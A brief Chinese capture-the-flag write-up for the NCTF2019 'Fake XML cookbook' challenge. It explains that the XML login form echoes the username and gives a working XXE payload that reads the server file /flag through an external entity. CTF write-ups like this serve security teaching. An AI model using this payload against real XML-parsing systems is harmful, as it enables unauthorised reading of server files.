[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbook

考点

  • XXE

wp

打开就是登录界面,抓包,是XML

会回显username,直接进行XXE注入

<!DOCTYPE ANY [
    <!ENTITY test SYSTEM "file:///flag">
]>
<user><username>&test;</username><password>123</password></user>
上一页[SUCTF 2018]GetShell下一页[NCTF2019]True XML cookbook

最后更新于